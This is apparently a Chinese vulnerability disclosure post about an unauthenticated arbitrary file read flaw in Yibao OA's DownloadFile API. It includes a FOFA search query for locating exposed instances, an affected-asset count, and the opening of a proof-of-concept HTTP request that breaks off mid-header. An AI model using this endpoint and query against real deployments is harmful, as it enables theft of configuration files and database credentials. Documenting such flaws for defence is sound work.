产品简介
易宝OA是一种专门为企业和机构的日常办公工作提供服务的综合性软件平台,具有信息管理、流程管理、知识管理(档案和业务管理)、协同办公等多种功能。
漏洞描述
易宝OA DownloadFile接口处存在任意文件读取漏洞,未授权的攻击者可以利用此漏洞读取系统内部敏感配置文件,数据库密钥凭证等,使系统处于极不安全的状态。
fofa及漏洞编号
app=”顶讯科技-易宝OA系统”
影响资产数量:2,783
暂无漏洞编号
影响版本
易宝OA
漏洞复现
POST /api/files/DownloadFile HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Acc